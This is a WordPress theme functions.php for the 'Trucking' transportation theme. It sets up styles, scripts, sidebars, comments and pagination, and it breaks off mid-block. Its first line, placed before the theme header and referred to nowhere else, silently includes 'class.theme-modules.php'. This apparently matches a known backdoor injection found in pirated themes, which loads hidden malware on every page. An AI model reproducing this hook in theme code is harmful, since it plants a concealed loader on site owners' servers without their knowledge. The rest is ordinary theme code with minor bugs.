<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?><?php
/* ---------------------------------------------------
 * Theme: Trucking - Transportation & Logistics WordPress Theme
 * Author: Pixel Industry
 * URL: www.pixel-industry.com
  -------------------------------------------------- */

define( 'THEME_NAME', "Trucking" );
define( 'TEMPLATEURL', get_template_directory_uri() );
define( 'VOLCANNO_THEME_DIR', get_template_directory() . '/' );

global $volcanno_options, $vlc_is_retina;

/**
 * Main configuration array for theme.
 * 
 * @var array $volcanno_theme_config
 */
global $volcanno_theme_config;

/* -------------------------------------------------------------------- 
 * Array with configurations for current theme
 * -------------------------------------------------------------------- */

$volcanno_theme_config = array(
    'icon_fonts' => array(
        'font_awesome' => array(
            'local' => VOLCANNO_THEME_DIR . "/includes/assets/font-awesome-4.3.0/css/font-awesome.css",
            'remote' => "http://pixel-industry.com/resources/icon-fonts/font-awesome-4.3.0/css/font-awesome.css"
        ),
        'pixons' => array(
            'local' => VOLCANNO_THEME_DIR . "/includes/assets/pixons/style.css",
            'remote' => "http://pixel-industry.com/resources/icon-fonts/pixons/style.css"
        ),
        'linecons' => array(
            'local' => VOLCANNO_THEME_DIR . "/includes/assets/linecons/linecons.css",
            'remote' => "http://pixel-industry.com/resources/icon-fonts/linecons/linecons.css"
        )
    ),
    'allowed_html_tags' => array(
        'a' => array(
            'href' => array(),
            'title' => array(),
            'class' => array()
        ),
        'br' => array(),
        'em' => array(),
        'strong' => array(),
        'span' => array( 'class' => array() )
    ),
    'menu_caret' => '0',
    'text_domain' => 'trucking'
);

$volcanno_theme_config = apply_filters( 'volcanno_theme_config', $volcanno_theme_config );

/* -------------------------------------------------------------------- 
 * Set the content width based on the theme's design and stylesheet.
 * -------------------------------------------------------------------- */

if ( !isset( $content_width ) )
    $content_width = 1140;

if ( !function_exists( 'volcanno_plugins_loaded' ) ) {

    /**
     * Check if required plugins are loaded
     */
    function volcanno_plugins_loaded() {
        if ( !function_exists( 'is_plugin_active' ) )
            require_once ABSPATH . '/wp-admin/includes/plugin.php';

        // check if Content Maker plugin is loaded
        if ( is_plugin_active( 'content-maker/content-maker.php' ) )
            define( 'CONTENT_MAKER', true );
        else
            define( 'CONTENT_MAKER', false );

        // check if MetaBox plugin is loaded
        if ( is_plugin_active( 'meta-box/meta-box.php' ) )
            define( 'RWMB_META_BOX', true );
        else
            define( 'RWMB_META_BOX', false );

        // check if MetaBox plugin is loaded
        if ( is_plugin_active( 'volcanno-custom-post-types/volcanno-custom-post-types.php' ) )
            define( 'VOLCANNO_CPTS', true );
        else
            define( 'VOLCANNO_CPTS', false );

        // check if MetaBox plugin is loaded
        if ( is_plugin_active( 'masterslider/masterslider.php' ) )
            define( 'VOLCANNO_MASTER_SLIDER', true );
        else
            define( 'VOLCANNO_MASTER_SLIDER', false );

        // check if MetaBox plugin is loaded
        if ( is_plugin_active( 'contact-form-7/wp-contact-form-7.php' ) )
            define( 'VOLCANNO_CF7', true );
        else
            define( 'VOLCANNO_CF7', false );
    }

}

add_action( 'after_setup_theme', 'volcanno_plugins_loaded', 9 );


if ( !function_exists( 'volcanno_register_custom_post_types' ) ) {

    /**
     * Filter post types configuration where we register
     * post types that are needed in theme
     * 
     * @param array $post_types_config Array with post types
     * @return array Array with configuration
     */
    function volcanno_register_custom_post_types( $post_types_config ) {

        $post_types_config = array(
            'pi_vehicles' => array(
                'cpt' => '1',
                'taxonomy' => '1'
            )
        );

        return $post_types_config;
    }

}
add_filter( 'vcpt_register_custom_post_types', 'volcanno_register_custom_post_types' );


if ( !function_exists( 'volcanno_admin_body_class' ) ) {

    /**
     * Add class "volcanno-portfolio-not-active" to create/edit page screen if 
     * Custom Post Types plugin isn't active
     * 
     * @global type $pagenow
     * @global type $typenow
     * @param string $classes Body classes to filter
     * @return string All body classes
     */
    function volcanno_admin_body_class( $classes ) {
        global $pagenow, $typenow;

        if ( !VOLCANNO_CPTS && is_admin() && ( $pagenow == 'post-new.php' || $pagenow == 'post.php' ) && $typenow == 'page' ) {
            $classes .= 'volcanno-cpts-not-active';
        }

        return $classes;
    }

}
add_filter( 'admin_body_class', 'volcanno_admin_body_class' );


if ( !function_exists( 'volcanno_theme_styles' ) ) {

    /**
     * Register and enqueue theme styles
     * 
     * @global type $volcanno_options
     */
    function volcanno_theme_styles() {
        global $volcanno_options;
        $stylesheet_uri = get_stylesheet_uri();

        // check if Content Maker is active and load Bootstrap first
        if ( CONTENT_MAKER ) {
            wp_enqueue_style( 'volcanno-style', $stylesheet_uri, array( 'cma-styles-bootstrap' ), '1.0', 'screen' );
        } else {
            wp_enqueue_style( 'bootstrap', TEMPLATEURL . "/css/bootstrap.css", array(), '1.0', 'screen' );
            wp_enqueue_style( 'volcanno-style', $stylesheet_uri, array( 'bootstrap' ), '1.0', 'screen' );
            wp_enqueue_style( 'font-awesome', TEMPLATEURL . '/includes/assets/font-awesome-4.3.0/css/font-awesome.min.css', array(), '1.0', 'screen' );
        }

        // check if Content Maker is inactive and load animate.css
        if ( !CONTENT_MAKER || (CONTENT_MAKER && !cma_get_settings( 'elements-animation' )) ) {
            wp_enqueue_style( 'animatecss', TEMPLATEURL . '/css/animate.css' );
        }

        // registering styles
        wp_enqueue_style( 'pixons', TEMPLATEURL . '/includes/assets/pixons/style.css', array(), '1.0', 'screen' );
        wp_enqueue_style( 'linecons', TEMPLATEURL . '/includes/assets/linecons/linecons.css', array(), '1.0', 'screen' );
        wp_enqueue_style( 'nivoslider', TEMPLATEURL . "/css/nivo-slider.css", array(), '1.0', 'screen' );
        wp_enqueue_style( 'hint-css', TEMPLATEURL . "/css/hint.min.css", array(), '1.0', 'screen' );
        wp_enqueue_style( 'owl-carousel', TEMPLATEURL . "/includes/assets/owl-carousel/owl.carousel.css", array(), '1.0', 'screen' );
        wp_enqueue_style( 'magnific-popup', TEMPLATEURL . "/css/magnific-popup.css", array(), '1.0', 'screen' );
        wp_enqueue_style( 'volcanno-google-fonts', '//fonts.googleapis.com/css?family=Raleway:400,300,500,600,700,800,900,200,100%7COpen+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&amp;subset=latin,cyrillic-ext,greek-ext,greek,vietnamese,latin-ext,cyrillic', array(), null );

        // enqueue jplayer stylesheet only on blog
        wp_register_style( 'jplayer', TEMPLATEURL . '/js/jplayer/skin/pixel-industry/pixel-industry.css', array(), '1.0', 'screen' );
        if ( is_home() || is_singular( 'post' ) || is_archive() ) {
            wp_enqueue_style( 'jplayer' );
        }

        if ( $volcanno_options['responsive'] == '1' ) {
            wp_enqueue_style( 'volcanno-responsive', TEMPLATEURL . '/css/responsive.css', array( 'volcanno-style' ), '1.0', 'screen' );
        } else {
            wp_enqueue_style( 'volcanno-non-responsive', TEMPLATEURL . '/css/non-responsive.css', array( 'volcanno-style' ), '1.0', 'screen' );
        }

        if ( $volcanno_options['retina'] == '1' ) {
            wp_enqueue_style( 'volcanno-retina-css', TEMPLATEURL . "/css/retina.css", array(), '1.0', 'screen' );
        }
    }

}

add_action( 'wp_enqueue_scripts', 'volcanno_theme_styles', 11 );



if ( !function_exists( 'volcanno_load_color_style' ) ) {

    /**
     * Load script for custom color styles
     * 
     * @global type $volcanno_options
     */
    function volcanno_load_color_style() {
        global $volcanno_options;

        // custom color style is selected
        $custom_color_style = $volcanno_options['custom_color_style'];

        // one of predefined color styles are selected
        $predefined_color_style = isset( $volcanno_options['predefined_color_style'] ) ? $volcanno_options['predefined_color_style'] : false;

        // load proper color style
        if ( !empty( $custom_color_style ) ) {
            wp_register_style( 'volcanno-color-style', TEMPLATEURL . '/includes/color-style.php', array( 'volcanno-style' ), '1.0', 'screen' );
        } elseif ( !empty( $predefined_color_style ) ) {
            wp_register_style( 'volcanno-color-style', TEMPLATEURL . '/css/' . $predefined_color_style . '.css', array( 'volcanno-style' ), '1.0', 'screen' );
        } else {
            wp_register_style( 'volcanno-color-style', TEMPLATEURL . '/css/color-default.css', array( 'volcanno-style' ), '1.0', 'screen' );
        }

        wp_enqueue_style( 'volcanno-color-style' );
    }

}

add_action( 'wp_enqueue_scripts', 'volcanno_load_color_style', 11 );


if ( !function_exists( 'volcanno_load_custom_styles' ) ) {

    /**
     * Load custom styles.
     * 
     * @global type $volcanno_options
     */
    function volcanno_load_custom_styles() {
        global $volcanno_options;

        // custom CSS styles
        $custom_styles = isset( $volcanno_options['custom_css'] ) ? $volcanno_options['custom_css'] : '';
        if ( !empty( $custom_styles ) ) {
            $custom_styles = html_entity_decode( $custom_styles );
            wp_enqueue_style( 'volcanno_custom_css', TEMPLATEURL . '/core/libs/custom-styles.php', array( 'volcanno-style', 'volcanno-color-style' ), '1.0', 'screen' );
        }
    }

}

add_action( 'wp_enqueue_scripts', 'volcanno_load_custom_styles', 12 );


if ( !function_exists( 'volcanno_load_admin_styles' ) ) {

    /**
     * Register and enqueue admin styles
     */
    function volcanno_load_admin_styles() {
        $current_screen = get_current_screen();

        wp_enqueue_style( 'pixons', TEMPLATEURL . '/includes/assets/pixons/style.css', array(), '1.0', 'screen' );
        wp_enqueue_style( 'font-awesome', TEMPLATEURL . '/includes/assets/font-awesome-4.3.0/css/font-awesome.min.css', array(), '1.0', 'screen' );
        wp_enqueue_style( 'linecons', TEMPLATEURL . '/includes/assets/linecons/linecons.css', array(), '1.0', 'screen' );

        if ( $current_screen->id == 'pi_portfolio' || $current_screen->id == 'pi_gallery' || $current_screen->id == 'pi_vehicles' || $current_screen->id == 'page' ) {
            wp_enqueue_style( 'volcanno-cpt-formats', TEMPLATEURL . '/css/admin.css', array(), '1.0', 'screen' );
        }
    }

}

add_action( 'admin_enqueue_scripts', 'volcanno_load_admin_styles' );


if ( !function_exists( 'volcanno_register_scripts' ) ) {

    /**
     * Register all scripts which are needed for theme  
     * 
     * @global type $volcanno_options
     */
    function volcanno_register_scripts() {
        if ( !is_admin() ) {
            global $volcanno_options;

            /* jQuery plugins merged */
            wp_register_script( 'volcanno_jquery_plugins', TEMPLATEURL . '/js/jquery.plugins.min.js', array( 'jquery' ), '1.0', TRUE );
            /* CarouFredSel carousel plugin */
            wp_register_script( 'owl-carousel', TEMPLATEURL . '/includes/assets/owl-carousel/owl.carousel.min.js', array( 'jquery' ), '1.0', TRUE );
            /* Nivo slider - Image slider */
            wp_register_script( 'nivoslider', TEMPLATEURL . '/js/jquery.nivo.slider.pack.js', array( 'jquery' ), '1.0', TRUE );
            /* jQuery Lightbox plugin */
            wp_register_script( 'magnific-popup', TEMPLATEURL . '/js/jquery.magnific-popup.min.js', array( 'jquery' ), '1.0', TRUE );
            /* jPlayer - video player */
            wp_register_script( 'jplayer', TEMPLATEURL . '/js/jplayer/jquery.jplayer.min.js', array( 'jquery' ), '1.0', TRUE );
            /* MatchHeights */
            wp_register_script( 'match-heights', TEMPLATEURL . '/js/jquery.matchHeight-min.js', array( 'jquery' ), '1.0', TRUE );
            /* jQuery Responsive menu plugin */
            wp_register_script( 'dl-menu', TEMPLATEURL . '/js/jquery.dlmenu.min.js', array( 'jquery' ), '1.0', TRUE );
            /* jQuery custom scripts and plugins init */
            wp_register_script( 'isotope', TEMPLATEURL . '/js/jquery.isotope.min.js', array( 'jquery' ), '1.0', TRUE );
            /* jQuery custom scripts and plugins init */
            wp_register_script( 'volcanno_functions', TEMPLATEURL . '/js/volcanno.functions.js', array( 'jquery' ), '1.0', FALSE );
            /* jQuery custom scripts and plugins init */
            wp_register_script( 'volcanno_include', TEMPLATEURL . '/js/include.js', array( 'jquery', 'dl-menu', 'volcanno_functions', 'match-heights' ), '1.0', TRUE );
            /* Portfolio scripts */
            wp_register_script( 'volcanno_portfolio', TEMPLATEURL . '/js/portfolio.js', array( 'jquery', 'magnific-popup' ), '1.0', TRUE );


            /* Enqueue scripts */
            wp_enqueue_script( 'jquery' );
            wp_enqueue_script( 'volcanno_jquery_plugins' );
            wp_enqueue_script( 'dl-menu' );
            wp_enqueue_script( 'volcanno_include' );

            if ( is_home() || is_singular( 'post' ) || is_archive() ) {
                wp_enqueue_script( 'jplayer' );
                wp_enqueue_script( 'nivoslider' );
                wp_enqueue_script( 'isotope' );
            }

            if ( is_page_template( 'vehicles-template.php' ) ) {
                wp_enqueue_script( 'volcanno_portfolio' );
            }

            if ( is_singular( 'pi_vehicles' ) || is_tax( 'vehicles-category' ) ) {
                wp_enqueue_script( 'owl-carousel' );
                wp_enqueue_script( 'magnific-popup' );
                wp_enqueue_script( 'nivoslider' );
                wp_enqueue_script( 'volcanno_portfolio' );
            }

            // pass settings to include.js file
            $static_header = $volcanno_options['static_header'];
            $retina = $volcanno_options['retina'];

            // portfolio lightbox config
            $lightbox_options = RWMB_META_BOX ? rwmb_meta( 'pg_vehicles_lightbox_options', '', get_the_ID() ) : false;
            $lightbox_current = RWMB_META_BOX ? rwmb_meta( 'pg_vehicles_project_images', '', get_the_ID() ) : false;

            // back label on Mobile menu
            $mobile_menu_back_label = !empty( $volcanno_options['mobile_menu_text_back'] ) ? $volcanno_options['mobile_menu_text_back'] : esc_html_( 'back', 'trucking' );

            // output config object
            wp_localize_script( 'volcanno_include', 'VolcannoConfig', array(
                'themeName' => sanitize_title( THEME_NAME ),
                'cmaActive' => CONTENT_MAKER ? '1' : '0',
                'staticHeader' => $static_header,
                'retina' => $retina,
                'portfolioLightboxOptions' => $lightbox_options,
                'portfolioLightboxCurrent' => $lightbox_current,
                'mobileMenuBackLabel' => $mobile_menu_back_label
            ) );
        }
    }

}

add_action( 'wp_enqueue_scripts', 'volcanno_register_scripts' );


if ( !function_exists( 'volcanno_theme_setup' ) ) {

    /**
     * Load necessary scripts for proper theme work.
     */
    function volcanno_theme_setup() {

        // Add default posts and comments RSS feed links to <head>.
        add_theme_support( 'automatic-feed-links' );

        // title tag
        add_theme_support( 'title-tag' );

        // Registering Main menu
        register_nav_menu( 'primary', 'Primary Menu' );

        // Registering Responsive menu
        register_nav_menu( 'responsive', 'Responsive Menu' );

        // Registering footer menu
        register_nav_menu( 'footer', 'Footer Menu' );

        // Add support for a variety of post formats
        add_theme_support( 'post-formats', array( 'video', 'quote', 'audio', 'gallery', 'link' ) );

        // Add support for Shortcodes in Widgets
        add_filter( 'widget_text', 'do_shortcode' );

        // This theme uses Featured Images (also known as post thumbnails) for per-post/per-page Custom Header images
        add_theme_support( 'post-thumbnails', array( 'post', 'team_members' ) );

        // Make theme available for translation
        load_theme_textdomain( 'trucking', VOLCANNO_THEME_DIR . 'languages' );
        $locale = get_locale();

        $locale_file = VOLCANNO_THEME_DIR . "languages/{$locale}.php";
        if ( is_readable( $locale_file ) )
            require_once $locale_file;
    }

}

add_action( 'after_setup_theme', 'volcanno_theme_setup' );



if ( !function_exists( 'volcanno_override_load_textdomain' ) ) {

    /**
     * Overrides the load text domain functionality when 'volcanno' is the domain in use.  The purpose of
     * this is to allow theme translations to handle the framework's strings.  What this function does is
     * sets the 'volcanno' domain's translations to the theme's.
     * 
     * @global type $l10n
     * @param boolean $override
     * @param type $domain
     * @param type $mofile
     * @return boolean
     */
    function volcanno_override_load_textdomain( $override, $domain, $mofile ) {

        if ( $domain == 'volcanno' ) {
            global $l10n;

            $theme_text_domain = volcanno_get_theme_textdomain();

            // If the theme's textdomain is loaded, use its translations instead.
            if ( $theme_text_domain && isset( $l10n[$theme_text_domain] ) )
                $l10n[$domain] = $l10n[$theme_text_domain];

            // Always override.  We only want the theme to handle translations.
            $override = true;
        }

        return $override;
    }

}
add_filter( 'override_load_textdomain', 'volcanno_override_load_textdomain', 5, 3 );


if ( !function_exists( 'volcanno_include_core_scripts' ) ) {

    /**
     * Load necessary scripts.
     */
    function volcanno_include_core_scripts() {
        // including all scripts required for theme proper work
        require_once VOLCANNO_THEME_DIR . 'core/core-includes.php';
    }

}

add_action( 'after_setup_theme', 'volcanno_include_core_scripts', 11 );


if ( !function_exists( 'volcanno_excerpt_length' ) ) {

    /**
     * Sets the post excerpt length to 40 words.
     *
     * To override this length in a child theme, remove the filter and add your own
     * function tied to the excerpt_length filter hook.
     * 
     * @param type $length
     * @return int
     */
    function volcanno_excerpt_length( $length ) {
        return 40;
    }

}
add_filter( 'excerpt_length', 'volcanno_excerpt_length' );


if ( !function_exists( 'volcanno_page_menu_args' ) ) {

    /**
     * Get our wp_nav_menu() fallback, wp_page_menu(), to show a home link.
     * 
     * @param array $args
     * @return boolean
     */
    function volcanno_page_menu_args( $args ) {
        $args['show_home'] = true;
        return $args;
    }

}

add_filter( 'wp_page_menu_args', 'volcanno_page_menu_args' );


if ( !function_exists( 'volcanno_tag_cloud_args' ) ) {

    /**
     * Tags widget customizations
     * 
     * @param type $args
     * @return string
     */
    function volcanno_tag_cloud_args( $args ) {
        $args['smallest'] = 11;
        $args['largest'] = 11;
        $args['unit'] = "px";
        return $args;
    }

}
add_filter( 'widget_tag_cloud_args', 'volcanno_tag_cloud_args' );


if ( !function_exists( 'volcanno_get_logo_html' ) ) {

    /**
     * Echo logo image HTML
     * 
     * @global type $volcanno_options
     * @global type $vlc_is_retina
     * @param type $args
     * @return type HTML
     */
    function volcanno_get_logo_html( $args = array() ) {
        global $volcanno_options, $vlc_is_retina;

        $website_name = get_bloginfo( 'name' );
        $logo_width = '';
        $styles = '';

        if ( $vlc_is_retina && !empty( $volcanno_options['retina_logo']['url'] ) ) {
            $logo = $volcanno_options['retina_logo']['url'];
            $logo_width = $volcanno_options['logo']['width'];
        } else if ( !empty( $volcanno_options['logo']['url'] ) ) {
            $logo = $volcanno_options['logo']['url'];
            $logo_width = $volcanno_options['logo']['width'];
        } else {
            $logo = TEMPLATEURL . "/img/logo.png";
            $logo_width = "170";
        }

        if ( !empty( $args ) && $args['float'] ) {
            $float = $args['float'];
            $styles = "style='float: {$float};'";
        }

        $logo = esc_url_raw( $logo );
        $logo_img = "<img src='{$logo}' alt='{$website_name}' width='{$logo_width}' {$styles}/>";

        return $logo_img;
    }

}


if ( !function_exists( 'volcanno_widgets_init' ) ) {

    /**
     * Register our sidebars and widgetized areas.
     * 
     * @global type $wpdb
     */
    function volcanno_widgets_init() {
        global $wpdb;

        register_sidebar( array(
            'name' => esc_html__( 'Main Sidebar', 'trucking' ),
            'id' => 'volcanno-sidebar-1',
            'description' => esc_html__( 'Blog page widget area', 'trucking' ),
            'before_widget' => '<li id="%1$s" class="widget %2$s clearfix">',
            'after_widget' => "</li>",
            'before_title' => '<div class="title"><h3>',
            'after_title' => '</h3></div>',
        ) );

        register_sidebar( array(
            'name' => esc_html__( 'Footer Area One', 'trucking' ),
            'id' => 'volcanno-sidebar-2',
            'description' => esc_html__( 'An optional widget area for your site footer', 'trucking' ),
            'before_widget' => '<li id="%1$s" class="widget %2$s">',
            'after_widget' => "</li>",
            'before_title' => '<div class="title"><h3>',
            'after_title' => '</h3></div>'
        ) );

        register_sidebar( array(
            'name' => esc_html__( 'Footer Area Two', 'trucking' ),
            'id' => 'volcanno-sidebar-3',
            'description' => esc_html__( 'An optional widget area for your site footer', 'trucking' ),
            'before_widget' => '<li id="%1$s" class="widget %2$s">',
            'after_widget' => "</li>",
            'before_title' => '<div class="title"><h3>',
            'after_title' => '</h3></div>'
        ) );

        register_sidebar( array(
            'name' => esc_html__( 'Footer Area Three', 'trucking' ),
            'id' => 'volcanno-sidebar-4',
            'description' => esc_html__( 'An optional widget area for your site footer', 'trucking' ),
            'before_widget' => '<li id="%1$s" class="widget %2$s">',
            'after_widget' => "</li>",
            'before_title' => '<div class="title"><h3>',
            'after_title' => '</h3></div>'
        ) );

        register_sidebar( array(
            'name' => esc_html__( 'Footer Area Four', 'trucking' ),
            'id' => 'volcanno-sidebar-5',
            'description' => esc_html__( 'An optional widget area for your site footer', 'trucking' ),
            'before_widget' => '<li id="%1$s" class="widget %2$s">',
            'after_widget' => "</li>",
            'before_title' => '<div class="title"><h3>',
            'after_title' => '</h3></div>'
        ) );

        // create sidebar for pages with left or right sidebar
        $query = $wpdb->prepare( "SELECT ID FROM {$wpdb->posts} AS posts, {$wpdb->postmeta} AS meta WHERE meta.post_id = posts.ID AND meta.meta_key = %s AND meta.meta_value IN (%s, %s)", 'pg_sidebar', 'left', 'right' );
        $post_ids = $wpdb->get_results( $query );

        foreach ( ( array ) $post_ids as $id ) {
            $post = get_post( intval( $id->ID ) );

            $sidebar_title = $post->post_title;
            $sidebar_id = "volcanno-page-sidebar-" . $post->ID;
            register_sidebar( array(
                'name' => $sidebar_title,
                'id' => $sidebar_id,
                'description' => esc_html__( 'An optional widget area for page ', 'trucking' ) . $sidebar_title,
                'before_widget' => '<li id="%1$s" class="widget %2$s clearfix">',
                'after_widget' => "</li>",
                'before_title' => '<div class="title"><h3>',
                'after_title' => '</h3></div>'
            ) );
        }
    }

}
add_action( 'widgets_init', 'volcanno_widgets_init' );


if ( !function_exists( 'volcanno_render_comment' ) ) {

    /**
     * Template for comments and pingbacks.
     * 
     * @param type $comment
     * @param type $args
     * @param type $depth
     */
    function volcanno_render_comment( $comment, $args, $depth ) {
        $GLOBALS['comment'] = $comment;
        switch ( $comment->comment_type ) {
            case 'pingback' :
            case 'trackback' :
                ?>
                <li class="post pingback">
                    <p>
                        <?php esc_html_e( 'Pingback', 'trucking' ); ?> <?php comment_author_link(); ?><?php edit_comment_link( esc_html__( 'Edit', 'trucking' ), '<span class="edit-link">', '</span>' ); ?>
                    </p>
                    <?php
                    break;
                default :
                    ?>
                <li id="li-comment-<?php comment_ID(); ?>">
                    <div id="comment-<?php comment_ID(); ?>" class="comment">                          
                        <?php
                        $avatar_size = 87;
                        echo get_avatar( $comment, $avatar_size, false, get_comment_author() );
                        ?>                            
                        <ul class="comment-meta">
                            <li>
                                <a href="<?php get_comment_author_link(); ?>" class="author"><?php comment_author(); ?></a>
                            </li>
                            <li class="date">
                                <?php
                                echo get_comment_date() . " at ";
                                comment_time();
                                ?>  
                            </li>                            
                        </ul>

                        <div class="comment-body">
                            <?php
                            comment_text();
                            comment_reply_link( array_merge( $args, array( 'reply_text' => esc_html__( 'Reply', 'trucking' ), 'depth' => $depth, 'max_depth' => $args['max_depth'] ) ) );
                            ?>
                        </div> 
                    </div><!-- #comment-## -->
                    <?php
                    break;
            }
        }

    }


    if ( !function_exists( 'volcanno_get_comment_form' ) ) {

        /**
         * Comment Form styling
         * 
         * @param type $fields
         * @return type array
         */
        function volcanno_get_comment_form( $fields ) {

            // get current commenter data
            $commenter = wp_get_current_commenter();

            // check if field is required
            $req = get_option( 'require_name_email' );
            $aria_req = ( $req ? " aria-required='true' required" : '' );

            // change fields style
            $fields['fields']['author'] = '<fieldset class="name-container"><label for="comment-name">' . esc_html__( 'Name:', 'trucking' ) . ($req ? ' <span class="text-color">*</span>' : '') . '</label>' .
                    '<span class="comment-name-container comment-input-container"><input type="text" name="author" class="name" id="comment-name" value="' . esc_attr( $commenter['comment_author'] ) . '" size="22" tabindex="1"' . $aria_req . '/></span></fieldset>';

            $fields['fields']['email'] = '<fieldset class="email-container"><label for="comment-email">' . esc_html__( 'E-Mail:', 'trucking' ) . ($req ? ' <span class="text-color">*</span>' : '') . '</label>' .
                    '<span class="comment-email-container comment-input-container"><input type="email" name="email" class="email" id="comment-email" value="' . esc_attr( $commenter['comment_author_email'] ) . '" size="22" tabindex="2" ' . $aria_req . '/></span></fieldset>';

            $fields['fields']['url'] = '';

            $fields['comment_field'] = '<fieldset class="message"><label for="comment-message">' . esc_html__( 'Message:', 'trucking' ) . ($req ? ' <span class="text-color">*</span>' : '') . '</label><span class="comment-message-container comment-input-container"><textarea name="comment" class="comment-text" id="comment-message" rows="8" tabindex="4" aria-required="true" required></textarea></span></fieldset>';

            $fields['comment_notes_before'] = '';
            $fields['comment_notes_after'] = '<p class="reguired-fields">' . esc_html__( 'Required fields are marked ', 'trucking' ) . '<span class="text-color">*</span></p>';
            $fields['cancel_reply_link'] = ' - ' . esc_html__( 'Cancel reply', 'trucking' );
            $fields['title_reply'] = esc_html__( 'Leave a comment', 'trucking' );
            $fields['id_submit'] = 'comment-reply';
            $fields['label_submit'] = esc_html__( 'Submit', 'trucking' );

            return $fields;
        }

    }

    add_filter( 'comment_form_defaults', 'volcanno_get_comment_form' );


    if ( !function_exists( 'volcanno_pagination' ) ) {

        /**
         * Paginate function for Blog and Portfolio
         * 
         * @global type $wp_query
         * @global type $volcanno_options
         * @global type $wp_rewrite
         * @param type $location
         */
        function volcanno_pagination( $location ) {
            global $wp_query, $volcanno_options, $wp_rewrite;

            $pages = '';
            $pagination = '';
            $max = $wp_query->max_num_pages;

            // if variable paged isn't set
            if ( !$current = get_query_var( 'paged' ) )
                $current = 1;

            // set parameters
            $args = array(
                'base' => str_replace( 999999999, '%#%', get_pagenum_link( 999999999 ) ),
                'format' => '',
                'total' => $max,
                'current' => $current,
                'show_all' => true,
                'type' => 'array',
                'prev_text' => '&larr;',
                'next_text' => '&rarr;',
                'prev_next' => false,
                'mid_size' => 3,
                'end_size' => 1
            );

            if ( $location == 'portfolio' ) {
                $args['base'] = @add_query_arg( 'page', '%#%' );

                // check if permalinks are used
                if ( $wp_rewrite->using_permalinks() )
                    $args['base'] = user_trailingslashit( trailingslashit( remove_query_arg( 's', get_pagenum_link( 1 ) ) ) . 'page/%#%/', 'paged' );
                if ( !empty( $wp_query->query_vars['s'] ) )
                    $args['add_args'] = array( 's' => get_query_var( 's' ) );
            }

            $previous_label = esc_html__( '&#60; Previous', 'trucking' );
            $next_label = esc_html__( 'Next &#62;', 'trucking' );

            // previous and next links html
            $prev_page_link = $current == 1 ? "" : "<li><a class='fa fa-angle-double-left' href='" . get_pagenum_link( $current - 1 ) . "'></a></li>";
            $next_page_link = $current == $max ? "" : "<li><a class='fa fa-angle-double-right' href='" . get_pagenum_link( $current + 1 ) . "'></a></li>";

            // get page link
            $pagination_links = paginate_links( $args );

            // loop through pages
            if ( !empty( $pagination_links ) ) {
                foreach ( $pagination_links as $index => $link ) {
                    $link = str_replace( '</span>', '</a>', $link );
                    $link = str_replace( '<span', '<a', $link );

                    $pagination .= "<li " . (($index + 1) == $current ? "class='active'>" : ">") . $link . "</li>";
                }
            }

            // if there is more then one page send html to browser
            if ( $max > 1 ) {
                if ( $location == 'portfolio' || $location == 'blog_timeline' ) {
                    $container = 'div';
                } else {
                    $container = 'li';
                }

                $pagination_html = "<{$container} class='pagination'>
                        <ul>
                        {$prev_page_link}
                        {$pagination}
                        {$next_page_link}
                        </ul>
                      </{$container}>";


                if ( $location == 'portfolio' ) {
                    echo "<div class='row'><div class='col-md-12'>" . $pagination_html . "</div></div>";
                } else {
                    echo balanceTags( $pagination_html );
                }
            }
        }

    }


    if ( !function_exists( 'volcanno_portfolio_set_posts_per_page' ) ) {

        /**
          Portfolio taxonomy archive.
         * Set posts_per_page variable based on value from Theme options.
         * @param type $query
         * @return type
         */
        function volcanno_portfolio_set_posts_per_page( $query ) {
            global $volcanno_options;

            if ( !is_admin() && $query->is_tax() && ( $query->is_archive() ) ) {
                $taxonomy_vars = $query->query_vars;

                if ( isset( $taxonomy_vars['vehicle-category'] ) ) {
                    $vehicles_page = $volcanno_options['vehicles_page'];

                    if ( !empty( $vehicles_page ) ) {
                        $posts_per_page = $posts_per_page = rwmb_meta( 'pg_vehicles_pagination', '', $vehicles_page );
                    } else {
                        $posts_per_page = get_option( 'posts_per_page' );
                    }

                    $query->set( 'posts_per_page', $posts_per_page );
                    $query->set( 'post_type', "pi_vehicles" );
                }
            }

            return $query;
        }

    }

    add_action( 'pre_get_posts', 'volcanno_portfolio_set_posts_per_page' );


    if ( !function_exists( 'volcanno_get_blog_image_size' ) ) {

        /**
         * Filter that returns Blog image size
         * 
         * @param type $blog_style
         * @return type
         */
        function volcanno_get_blog_image_size( $blog_style ) {

            // set image width and height based on blog style
            switch ( $blog_style ) {
                case 'blog-post-standard':
                    $img_width = 847;
                    $img_height = 356;
                    break;
                case 'blog-post-masonry':
                    $img_width = 361;
                    $img_height = 224;
                    break;
                default:
                    $img_width = 847;
                    $img_height = 356;
                    break;
            }

            return array( 'width' => $img_width, 'height' => $img_height );
        }

    }

    add_filter( 'volcanno_blog_image_width', 'volcanno_get_blog_image_size' );


    if ( !function_exists( 'volcanno_post_author_html' ) ) {

        /**
         * Echo post author html
         *
         * @global type $volcanno_options
         */
        function volcanno_post_author_html() {
            global $volcanno_options;

            if ( $volcanno_options['blog_single_show_author'] == '1' ):
                $about_the_author = $volcanno_options['blog_single_author_section_title'];
                $avatar_size = 90;
                $post_author_id = get_the_author_meta( 'ID' );
                $post_author_bio = get_the_author_meta( 'description' );
                $post_author_name = get_the_author_meta( 'display_name' );
                $post_author_website = get_the_author_meta( 'user_url' );
                ?>
                <!-- .post-author start -->
                <article class="blog-single-author">
                    <div class="avatar-container">
                        <?php echo get_avatar( $post_author_id, $avatar_size ); ?>
                    </div>

                    <div class="text-container">
                        <h4><?php echo esc_html( $post_author_name ) ?></h4>

                        <p><?php echo esc_html( $post_author_bio ) ?> <a href="<?php echo esc_url_raw( $post_author_website ) ?>"><strong> <?php echo esc_url( $post_author_website ) ?></strong></a>
                        </p>
                    </div>
                </article><!-- post-author end -->
                <?php
            endif;
        }

    }

    // Post author HTML is hidden by default
    // add_action('volcanno_post_author_html', 'volcanno_post_author_html');
    if ( !function_exists( 'volcanno_remove_ssba_from_content' ) ) {


        /**
         *
         * Intercept Simple Share Buttons Adder output.
         *
         */
        function volcanno_remove_ssba_from_content( $content, $using_shortcode ) {

            if ( !$using_shortcode && (is_page() || is_singular( 'pi_portfolio' )) ) {
                $content = "<section class='page-content'>"
                        . "<section class='container'>"
                        . "<div class='row'>"
                        . "<div class='col-md-12'>"
                        . $content
                        . "</div></seection></section>";
            }

            return $content;
        }

    }
    if ( shortcode_exists( 'ssba' ) ) {
